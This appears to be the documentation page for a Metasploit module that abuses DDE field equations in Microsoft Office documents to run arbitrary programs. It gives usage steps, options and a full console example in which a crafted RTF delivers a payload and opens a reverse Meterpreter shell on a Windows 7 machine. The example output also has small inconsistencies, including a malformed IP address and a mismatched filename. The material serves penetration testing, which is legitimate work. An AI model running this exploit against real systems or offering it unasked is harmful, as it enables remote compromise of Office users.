Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.

## Vulnerable Application
All Microsoft Office versions

## Verification Steps

1. Start msfconsole
2. Do: `use exploit/windows/fileformat/office_dde_delivery`
3. Do: `set PAYLOAD [PAYLOAD]`
4. Do: `run`

## Options
### FILENAME
Filename to output, whether injecting or generating a blank one

### INJECT_PATH
Path to filename to inject


## Example

```
msf > use exploit/windows/fileformat/office_dde_delivery
msf exploit(office_dde_delivery) > set FILENAME msf.rtf
FILENAME => /home/mumbai/file.rtf
msf exploit(office_dde_delivery) > set LHOST ens3
LHOST => ens3
msf exploit(office_dde_delivery) > set LPORT 35116
LPORT => 35116
msf exploit(office_dde_delivery) > run
[*] Using URL: http://0.0.0.0:8080/DGADAcDZ
[*] Local IP: http://192.1668.0.11:8080/DGADAcDZ
[*] Server started.
[*] Handling request for .sct from 192.168.0.24
[*] Delivering payload to 192.168.0.24...
[*] Sending stage (205379 bytes) to 192.168.0.24
[*] Meterpreter session 1 opened (192.168.0.11:35116 -> 192.168.0.24:52217)

meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
```